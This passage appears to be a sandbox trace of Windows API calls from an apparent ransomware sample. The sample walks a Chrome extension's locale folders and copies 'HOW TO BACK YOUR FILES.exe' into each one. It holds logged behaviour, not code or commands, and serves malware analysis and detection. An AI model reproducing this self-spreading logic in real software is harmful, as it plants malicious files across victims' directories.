hTemplateFile=0x0) returned 0x120 [0104.930] GetLastError () returned 0x0 [0104.930] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.930] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.930] CloseHandle (hObject=0x120) returned 1 [0104.930] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.930] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6daab380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6daab380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.931] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.931] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.931] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko" [0104.931] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.931] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.932] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.932] GetLastError () returned 0x0 [0104.932] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.932] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.932] CloseHandle (hObject=0x120) returned 1 [0104.932] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.932] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dad14e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dad14e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.932] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.932] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.932] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja" [0104.933] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.933] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.933] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.933] GetLastError () returned 0x0 [0104.934] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.934] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.934] CloseHandle (hObject=0x120) returned 1 [0104.934] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.934] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6daf7640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6daf7640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.934] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.934] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.934] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it" [0104.934] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.934] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.935] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.936] GetLastError () returned 0x0 [0104.936] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.936] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.936] CloseHandle (hObject=0x120) returned 1 [0104.938] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.939] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6daf7640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6daf7640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.939] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.939] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.939] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id" [0104.939] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.939] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.940] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.940] GetLastError () returned 0x0 [0104.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.940] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.940] CloseHandle (hObject=0x120) returned 1 [0104.940] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.941] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6db1d7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6db1d7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.941] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.941] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.941] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu" [0104.941] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.941] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.942] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.942] GetLastError () returned 0x0 [0104.942] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.942] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.942] CloseHandle (hObject=0x120) returned 1 [0104.942] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.942] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6db1d7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6db1d7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.942] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.942] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.943] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr" [0104.943] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.943] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.943] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.944] GetLastError () returned 0x0 [0104.944] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.944] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.944] CloseHandle (hObject=0x120) returned 1 [0104.944] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6db43900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6db43900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.944] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.944] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.944] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi" [0104.944] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.944] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.945] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.945] GetLastError () returned 0x0 [0104.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.945] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.945] CloseHandle (hObject=0x120) returned 1 [0104.946] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.946] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6db43900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6db43900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.946] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.946] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.946] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr" [0104.946] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.946] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.947] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.947] GetLastError () returned 0x0 [0104.947] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.947] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.947] CloseHandle (hObject=0x120) returned 1 [0104.947] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.947] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6db43900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6db43900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.947] lstrcmpiW 